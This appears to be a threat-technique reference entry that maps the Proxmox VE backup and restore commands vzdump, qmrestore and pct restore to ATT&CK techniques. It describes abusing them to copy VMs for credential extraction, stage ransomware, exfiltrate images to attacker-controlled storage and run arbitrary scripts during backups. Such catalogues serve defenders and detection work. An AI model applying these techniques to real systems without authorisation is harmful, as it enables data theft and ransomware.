Categories: Collection, Exfiltration, Execution, Persistence

vzdump is the Proxmox VE backup utility for creating VM and container backups. It supports multiple backup modes and compression algorithms. Adversaries can abuse vzdump to create full VM snapshots for offline credential extraction, encrypt backups for ransomware operations, or exfiltrate entire VM images.

Collection

  1. Create a backup of a VM or container.

    vzdump {vmid}

    Use Case: Create full VM backups for offline analysis, credential extraction, or exfiltration.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1005
  2. Back up all VMs and containers on the node.

    vzdump --all

    Use Case: Mass backup of all VMs for comprehensive data theft or ransomware staging.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1005

Exfiltration

  1. Create a live snapshot backup to a specific directory.

    vzdump {vmid} --mode snapshot --dumpdir /path

    Use Case: Backup VMs to attacker-controlled storage for exfiltration.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1567

Execution

  1. Execute a custom script during backup phases (pre, post).

    vzdump {vmid} --script /path/to/script

    Use Case: Execute arbitrary code during backup operations for persistence or lateral movement.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1059

Persistence

  1. Restore a VM from a vzdump backup.

    qmrestore {backup.vma} {vmid}

    Use Case: Restore VMs from backups containing older vulnerable configurations or known credentials.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1078

  2. Restore a container from a vzdump backup.

    pct restore {ctid} {backup.tar} --storage local

    Use Case: Restore containers from backups to access older credentials or configurations.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1078